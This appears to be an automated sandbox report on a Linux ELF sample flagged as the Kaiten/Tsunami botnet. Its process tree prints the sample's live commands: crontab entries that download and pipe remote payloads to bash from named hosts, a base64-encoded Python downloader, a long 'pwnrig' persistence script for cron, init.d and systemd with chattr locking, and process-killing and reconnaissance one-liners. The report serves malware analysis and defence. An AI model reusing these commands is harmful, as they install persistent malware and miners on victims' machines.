Analysis
-
max time kernel
141s -
max time network
145s -
platform
ubuntu-20.04_amd64 -
resource
ubuntu2004-amd64-20240221-en -
resource tags
-
submitted
26-02-2024 01:01
General
-
Target
96a47e74c42f7cb2799ef064f413aeaeaf667662a3983b4e66556a827aa2481a.elf
-
Size
3.8MB
-
MD5
1184bf04877dec9a4bbb24acd30c8d49
-
SHA1
e68649a61a173c93775580ec0e975a3a87250e9d
-
SHA256
96a47e74c42f7cb2799ef064f413aeaeaf667662a3983b4e66556a827aa2481a
-
SHA512
25917099b31a0bd7b3fab4600c318c3a3acab5bb1c2dc8d7fbccfc22046fb7a551747065ad9016dba26d8de16a0782d4a7279a5b644c7802f4151c4d3184d104
-
SSDEEP
98304:e6M0JGEyxYXQKOscf3j3/DaNAq//XxsdQDYpexnaG4oDhAJ:i0JZ8yysw3zDuTXqQD+exawDhY
Malware Config
Signatures
-
Detects Kaiten/Tsunami Payload 1 IoCs
-
Detects Kaiten/Tsunami payload 1 IoCs
-
Kaiten/Tsunami
Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.
-
Executes dropped EXE 4 IoCs
-
Reads EFI boot settings 10 IoCs
Reads EFI boot settings from the efivars filesystem, may contain security secrets or sensitive data.
-
UPX packed file 3 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Attempts to change immutable files 14 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
-
Checks CPU configuration 1 TTPs 6 IoCs
Checks CPU information which indicate if the system is a virtual machine.
-
Checks hardware identifiers (DMI) 1 TTPs 8 IoCs
Checks DMI information which indicate if the system is a virtual machine.
-
Creates/modifies Cron job 1 TTPs 15 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies init.d 1 TTPs 3 IoCs
Adds/modifies system service, likely for persistence.
-
Modifies systemd 1 TTPs 3 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
-
Reads CPU attributes 1 TTPs 12 IoCs
-
Reads hardware information 1 TTPs 28 IoCs
Accesses system info like serial numbers, manufacturer names etc.
-
Writes file to system bin folder 1 TTPs 5 IoCs
-
Enumerates kernel/hardware configuration 1 TTPs 64 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
Writes file to tmp directory 8 IoCs
Malware often drops required files in the /tmp directory.
-
GoLang User-Agent 15 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
Processes
-
/tmp/96a47e74c42f7cb2799ef064f413aeaeaf667662a3983b4e66556a827aa2481a.elf/tmp/96a47e74c42f7cb2799ef064f413aeaeaf667662a3983b4e66556a827aa2481a.elf1⤵
- Modifies init.d
- Modifies systemd
- Writes file to system bin folder
- Writes file to tmp directory
-
/usr/bin/bashbash -c "rm -rf /etc/sysctl.conf ; echo fs.file-max = 2097152 > /etc/sysctl.conf ; sysctl -p ; ulimit -Hn ; ulimit -n 99999 -u 999999"2⤵
-
/usr/bin/rmrm -rf /etc/sysctl.conf3⤵
-
-
/usr/sbin/sysctlsysctl -p3⤵
-
-
-
/usr/bin/chattrchattr +ia /etc/init.d/knlib2⤵
-
-
/etc/init.d/knlib/etc/init.d/knlib start2⤵
- Executes dropped EXE
-
/usr/bin/cpcp -f -r -- /bin/knlib /bin/klibsystem43⤵
-
-
/usr/bin/rmrm -rf -- klibsystem43⤵
-
-
/usr/bin/nohupnohup ./klibsystem43⤵
-
-
-
/usr/bin/chattrchattr +ia /etc/systemd/system/knlibe.service2⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload2⤵
- Reads EFI boot settings
- Enumerates kernel/hardware configuration
-
-
/usr/bin/systemctlsystemctl enable knlibe.service2⤵
- Reads EFI boot settings
- Reads runtime system information
-
-
/usr/bin/chattrchattr +ia /bin/knlib2⤵
-
-
/usr/bin/bashbash -c "echo '*/10 * * * * (curl -s http://185.172.128.146:443/2.gif || wget -q -O - http://dw.c4kdeliver.top:443/2.gif || lwp-download http://dw.c4kdeliver.top:443/2.gif /tmp/2.gif) | bash -sh; bash /tmp/2.gif; rm -rf /tmp/2.gif; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDY6NDQzL2QucHkiKS5yZWFkKCkpJyB8fCBweXRob24yIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash' | crontab -"2⤵
-
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
-
-
-
/usr/bin/ssss -ant2⤵
-
-
/usr/bin/nohupnohup /tmp/bi.64 "&"2⤵
-
-
/tmp/bi.64/tmp/bi.64 "&"2⤵
- Executes dropped EXE
- Writes file to tmp directory
-
-
/usr/bin/ssss -ant2⤵
-
-
/usr/bin/nohupnohup /tmp/bin.64 -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d -pwn "&"2⤵
-
-
/tmp/bin.64/tmp/bin.64 -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d -pwn "&"2⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
-
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵
-
/usr/bin/whoamiwhoami4⤵
-
-
/usr/bin/hostnamehostname4⤵
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵
- Reads runtime system information
-
-
/usr/bin/psps -A "-ostat,ppid"4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/grepgrep -v grep4⤵
-
-
/usr/bin/grepgrep /etc/cron4⤵
-
-
/usr/bin/psps x4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/bin.64';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"3⤵
- Writes file to tmp directory
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"4⤵
- Attempts to change immutable files
-
-
/usr/bin/rmrm -rf /bin/bprofr4⤵
-
-
/usr/bin/sedsed -i /bprofr/d "~/.bash_profile"4⤵
- Attempts to change immutable files
- Reads runtime system information
-
-
/usr/bin/cpcp -f -r -- /tmp/bin.64 /bin/bprofr4⤵
- Writes file to system bin folder
-
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"4⤵
- Attempts to change immutable files
-
-
/usr/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly4⤵
-
-
/usr/bin/chattrchattr -i -a "/etc/cron.*/pwnrig" /bin/crondr4⤵
- Attempts to change immutable files
-
-
/usr/bin/rmrm -rf /bin/crondr4⤵
-
-
/usr/bin/cpcp -f -r -- /tmp/bin.64 /bin/crondr4⤵
- Writes file to system bin folder
-
-
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Attempts to change immutable files
- Creates/modifies Cron job
-
-
/usr/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵
-
-
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵
- Attempts to change immutable files
-
-
/usr/bin/whichwhich chkconfig4⤵
-
-
/usr/bin/whichwhich update-rc.d4⤵
-
-
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr4⤵
- Attempts to change immutable files
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable4⤵
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove4⤵
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Reads EFI boot settings
- Enumerates kernel/hardware configuration
-
-
-
/usr/bin/rmrm -rf /bin/initdr4⤵
-
-
/usr/bin/cpcp -f -r -- /tmp/bin.64 /bin/initdr4⤵
- Writes file to system bin folder
-
-
/usr/bin/teetee /etc/init.d/pwnrig4⤵
- Modifies init.d
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/init.d/pwnrig4⤵
- Attempts to change immutable files
- Modifies init.d
-
-
/usr/bin/chmodchmod +x /etc/init.d/pwnrig /bin/initdr4⤵
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig defaults4⤵
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Reads EFI boot settings
- Reads runtime system information
-
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig enable4⤵
-
/usr/local/sbin/systemctlsystemctl --quiet enable pwnrig5⤵
-
-
/usr/local/bin/systemctlsystemctl --quiet enable pwnrig5⤵
-
-
/usr/sbin/systemctlsystemctl --quiet enable pwnrig5⤵
-
-
/usr/bin/systemctlsystemctl --quiet enable pwnrig5⤵
- Reads EFI boot settings
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Reads EFI boot settings
- Enumerates kernel/hardware configuration
-
-
-
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr4⤵
- Attempts to change immutable files
-
-
/usr/bin/whichwhich systemctl4⤵
-
-
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵
- Attempts to change immutable files
-
-
/usr/bin/rmrm -rf /bin/sysdr4⤵
-
-
/usr/bin/cpcp -f -r -- /tmp/bin.64 /bin/sysdr4⤵
- Writes file to system bin folder
-
-
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵
- Modifies systemd
-
-
/usr/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵
- Attempts to change immutable files
-
-
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵
- Attempts to change immutable files
-
-
/usr/bin/systemctlsystemctl enable pwnrige.service4⤵
- Reads EFI boot settings
- Reads runtime system information
-
-
/usr/bin/systemctlsystemctl enable pwnrigl.service4⤵
- Reads EFI boot settings
- Enumerates kernel/hardware configuration
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
- Reads EFI boot settings
- Reads runtime system information
-
-
/usr/bin/systemctlsystemctl reload-or-restart pwnrige.service4⤵
- Reads EFI boot settings
-
-
-
-
/usr/bin/ssss -ant2⤵
-
-
/usr/bin/nohupnohup /tmp/bin.64 -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d "&"2⤵
-
-
/tmp/bin.64/tmp/bin.64 -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d "&"2⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
-
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵
- Attempts to change immutable files
-
/usr/bin/whoamiwhoami4⤵
-
-
/usr/bin/hostnamehostname4⤵
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵
-
-
/usr/bin/psps -A "-ostat,ppid"4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/grepgrep -v grep4⤵
-
-
/usr/bin/grepgrep /etc/cron4⤵
-
-
/usr/bin/psps x4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"4⤵
-
-
/usr/bin/grepgrep -v /usr/sbin/httpd4⤵
-
-
/usr/bin/grepgrep -v -- "-bash[[:space:]]*\$"4⤵
-
-
/usr/bin/grepgrep -v grep4⤵
-
-
/usr/bin/psps aux4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"3⤵
-
/usr/bin/idid -u4⤵
-
-
-
-
/usr/bin/bashbash -c "echo '*/10 * * * * (curl -s http://dw.c4kdeliver.top:443/2.gif || wget -q -O - http://dw.c4kdeliver.top:443/2.gif || lwp-download http://dw.c4kdeliver.top:443/2.gif /tmp/2.gif) | bash -sh; bash /tmp/2.gif; rm -rf /tmp/2.gif; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDY6NDQzL2QucHkiKS5yZWFkKCkpJyB8fCBweXRob24yIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash' | crontab -"2⤵
-
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
-
-
-
/usr/bin/ssss -ant2⤵
-
-
/usr/bin/ssss -ant2⤵
-
-
/usr/bin/ssss -ant2⤵
-
-
/usr/bin/bashbash -c "echo '*/10 * * * * (curl -s http://dw.c4kdeliver.top:443/2.gif || wget -q -O - http://dw.c4kdeliver.top:443/2.gif || lwp-download http://dw.c4kdeliver.top:443/2.gif /tmp/2.gif) | bash -sh; bash /tmp/2.gif; rm -rf /tmp/2.gif; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDY6NDQzL2QucHkiKS5yZWFkKCkpJyB8fCBweXRob24yIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash' | crontab -"2⤵
-
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
-
-
-
/usr/bin/ssss -ant2⤵
-
-
/usr/bin/ssss -ant2⤵
-
-
/usr/bin/ssss -ant2⤵
-
-
/usr/bin/bashbash -c "echo '*/10 * * * * (curl -s http://dw.c4kdeliver.top:443/2.gif || wget -q -O - http://dw.c4kdeliver.top:443/2.gif || lwp-download http://dw.c4kdeliver.top:443/2.gif /tmp/2.gif) | bash -sh; bash /tmp/2.gif; rm -rf /tmp/2.gif; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDY6NDQzL2QucHkiKS5yZWFkKCkpJyB8fCBweXRob24yIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash' | crontab -"2⤵
-
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
-
-
-
/usr/bin/ssss -ant2⤵
-
-
/usr/bin/ssss -ant2⤵
-
-
/usr/bin/ssss -ant2⤵
-
-
/usr/bin/klibsystem4./klibsystem41⤵
-
/usr/bin/hostnamehostname -I1⤵
-
/usr/bin/awkawk "{print \$1}"1⤵
-
/usr/bin/grepgrep "Port "1⤵
-
/usr/bin/headhead -n 11⤵
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵
-
/usr/bin/catcat /etc/ssh/sshd_config1⤵
-
/usr/bin/sedsed -e "s/\$//"1⤵
-
/usr/bin/sedsed -e "s/^ *//"1⤵
-
/usr/bin/cutcut -d: -f21⤵
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
-
/usr/bin/awkawk "{print \$1}"1⤵
-
/usr/bin/awkawk "{print \$4}"1⤵
-
/usr/bin/awkawk "{print \$4}"1⤵
-
/usr/bin/hostnamehostname -I1⤵
- Attempts to change immutable files
-
/usr/bin/awkawk "{print \$1}"1⤵
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵
-
/usr/bin/headhead -n 11⤵
-
/usr/bin/grepgrep "Port "1⤵
-
